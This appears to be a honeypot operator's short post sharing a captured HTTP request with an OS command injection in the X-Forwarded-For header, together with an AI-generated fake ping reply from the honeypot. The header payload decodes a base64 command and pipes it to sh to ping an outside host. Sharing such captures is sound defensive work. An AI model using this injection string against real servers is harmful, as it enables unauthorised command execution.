Payload question!
Does anyone know what application this targets ? It's doing OS command injection via the X-Forwarded-For header:
GET /ok.php?act=op&pid=10 HTTP/1.1
Host: x.x.x.x:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cache-Control: no-cache
Connection: keep-alive
Dnt: 1
Pragma: no-cache
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
X-Forwarded-For: "]]),true);';echo `echo cGluZyAtYyAxIDMxLjU2LjI3Ljc2 | base64 -d | sh`'
Also to brag a little bit: I always love to see when the AI response by Lophiid is spot on:
=== start
PING 31.56.27.76 (31.56.27.76) 56(84) bytes of data.
64 bytes from 31.56.27.76: icmp_seq=1 ttl=56 time=12.3 ms
--- 31.56.27.76 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
=== stop
#dfir #infosec #cybersecurity #honeypot